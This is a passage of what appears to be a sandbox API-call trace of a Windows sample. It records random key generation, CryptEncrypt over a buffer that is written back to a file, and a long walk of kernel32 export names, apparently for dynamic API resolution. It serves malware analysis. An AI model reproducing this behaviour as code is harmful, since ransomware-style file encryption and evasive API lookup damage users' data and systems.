flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0085.252] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.252] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.252] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.252] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.252] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0085.253] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.253] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.253] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.254] CloseHandle (hObject=0x414) returned 1 [0085.255] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.255] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0085.255] CloseHandle (hObject=0x0) returned 0 [0085.255] CloseHandle (hObject=0x410) returned 1 [0085.256] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.256] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.256] GetTickCount () returned 0x114dc5b [0085.256] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.256] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.256] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.257] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.257] lstrlenA (lpString="kernel32.dll") returned 12 [0085.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.257] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.257] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.257] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.257] lstrlenA (lpString="ADDATOMA") returned 8 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.257] lstrlenA (lpString="ADDATOMW") returned 8 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.257] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.257] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.257] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.257] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.258] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.258] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.258] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.258] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.258] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.258] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.258] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.258] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.258] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.258] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.258] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.258] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.258] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.258] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.258] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.258] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.258] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.258] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.258] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.259] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.259] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.259] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.259] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.259] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.259] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.259] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.259] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.259] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.259] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.259] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.259] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.259] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.259] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.259] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.259] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.259] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.259] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.259] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.259] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.260] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.260] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.260] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.260] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.260] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.260] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.260] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.260] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.260] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.260] lstrlenA (lpString="BEEP") returned 4 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.260] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.260] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.260] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.260] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.260] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.260] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.260] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.260] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.260] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.261] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.261] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.261] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.261] lstrlenA (lpString="CANCELIO") returned 8 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.261] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.261] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.261] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.261] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.261] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.261] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.261] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.261] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.261] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.261] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.261] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.261] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.261] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.261] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.261] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.262] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.262] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.262] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.262] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.262] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.262] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.262] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.262] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.262] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.262] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.262] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.262] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.262] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.262] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.262] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.263] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.263] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.263] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.263] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.263] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.263] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.263] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.263] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.263] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.263] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") 